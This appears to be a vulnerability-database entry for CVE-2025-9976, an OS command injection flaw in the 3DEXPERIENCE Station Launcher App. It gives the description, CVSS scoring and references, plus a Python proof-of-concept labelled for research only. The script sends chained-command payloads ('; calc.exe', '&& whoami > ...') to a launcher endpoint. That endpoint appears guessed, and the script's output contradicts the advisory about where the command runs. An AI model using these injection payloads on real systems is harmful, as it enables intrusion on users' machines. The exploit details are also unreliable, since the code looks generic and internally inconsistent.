CVE-2025-9976

Description

An OS Command Injection vulnerability affecting Station Launcher App in 3DEXPERIENCE platform from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x could allow an attacker to execute arbitrary code on the user's machine.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

3DEXPERIENCE R2022x

3DEXPERIENCE R2023x

3DEXPERIENCE R2024x

3DEXPERIENCE R2025x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-9976 PoC - OS Command Injection in 3DEXPERIENCE Station Launcher
# Vulnerability: Unvalidated input passed to OS command execution in Station Launcher App
# Affected: 3DEXPERIENCE R2022x through R2025x

import requests
import sys

TARGET_URL = "https://target-3dexperience-server"
AUTH_TOKEN = "low_privilege_user_token"

# Malicious payload - command injection via station launcher parameter
# The injected command will be executed on the victim's machine
MALICIOUS_PAYLOAD = {
    "launcher_action": "start",
    "app_id": "valid_app_id; calc.exe",  # Command injection via semicolon
    "params": "--user=admin && whoami > C:\\temp\\pwned.txt",  # Chained commands
    "session_id": "valid_session"
}

def exploit(target_url, auth_token, payload):
    """
    Send crafted request to Station Launcher endpoint with injected OS commands.
    When the victim interacts with the launcher, the injected commands execute locally.
    """
    headers = {
        "Authorization": f"Bearer {auth_token}",
        "Content-Type": "application/json",
        "User-Agent": "3DEXPERIENCE-StationLauncher/2024"
    }

    # Endpoint that triggers command execution in Station Launcher
    endpoint = f"{target_url}/stationlauncher/v1/launch"

    response = requests.post(endpoint, json=payload, headers=headers)

    if response.status_code == 200:
        print(f"[+] Payload delivered successfully")
        print(f"[+] When victim interacts, command will execute on: {target_url}")
    else:
        print(f"[-] Failed: {response.status_code}")

if __name__ == "__main__":
    exploit(TARGET_URL, AUTH_TOKEN, MALICIOUS_PAYLOAD)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-9976
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-9976
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-9976/
[4] VulDB https://vuldb.com/cve/CVE-2025-9976
[5] https://www.3ds.com/trust-center/security/security-advisories/cve-2025-9976

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-9976", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:41.547", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An OS Command Injection vulnerability affecting Station Launcher App in 3DEXPERIENCE platform from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x could allow an attacker to execute arbitrary code on the user's machine."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-9976", "source": "[email protected]"}]}}